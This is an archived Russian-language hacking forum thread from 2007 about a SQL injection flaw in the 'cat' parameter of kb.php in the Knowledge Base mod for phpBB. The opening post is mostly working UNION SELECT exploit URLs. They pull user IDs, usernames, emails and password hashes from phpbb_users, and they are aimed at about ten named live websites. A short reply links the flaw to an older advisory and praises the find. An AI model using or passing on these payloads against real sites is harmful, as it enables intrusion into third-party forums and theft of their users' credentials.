PDA

Просмотр полной версии : Sql injection в Knowledge Base


kamaz
05.04.2007, 17:18
Случайно наткнулся :) В поисковиках и на ачате ничего по этому поводу не нашел. Хотя бага старая. Так что если уже было, plz, больно не пинайте :)

Программа: Knowledge Base (мод для phpBB)

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cat" в сценарии kb.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://site/kb.php?mode=cat&cat=-1[sql injection]

Принтабельно вророе поле, информация выводится в title.

От чего зависит количество полей, я хз, но попадаются скули с 6 или с 24 полями.

Примеры с 6:

http://www.startrek-gamers.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

http://crossandflame.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

http://phpbb-auction.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

http://www.teamdirection.com/phpBB2/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%202,2/*

http://www.kartonwork.pl/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

http://www.websiteforum.nl/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

http://www.brazilfw.com.br/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

Примеры с 24:

http://forum.screamer-hardstyle.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20 limit%201,2/*

http://forum.pacan.net/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20 limit%201,2/*

Иногда отсутствует столбец phpbb_users, тогда делаем то же, что и при нахождении обычной скули. Например:

http://www.esnsweden.org/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(name,char(58),login, char(58),pass),3,4,5,6%20from%20users%20limit%201, 2/*

Воть :)

Thanat0z
05.04.2007, 17:21
некогда вникать, но сравни с __http://www.artofhacking.com/tucops/hack/webbbsfe/live/aoh_hack7435.htm, кажется это оно и есть...

2005 год.

Ну что могу сказать, не смотря что скуля давняя, ты ее нашел в последних версиях форумов, то есть форумы обновляют, а мод нет.

Всё равно молодец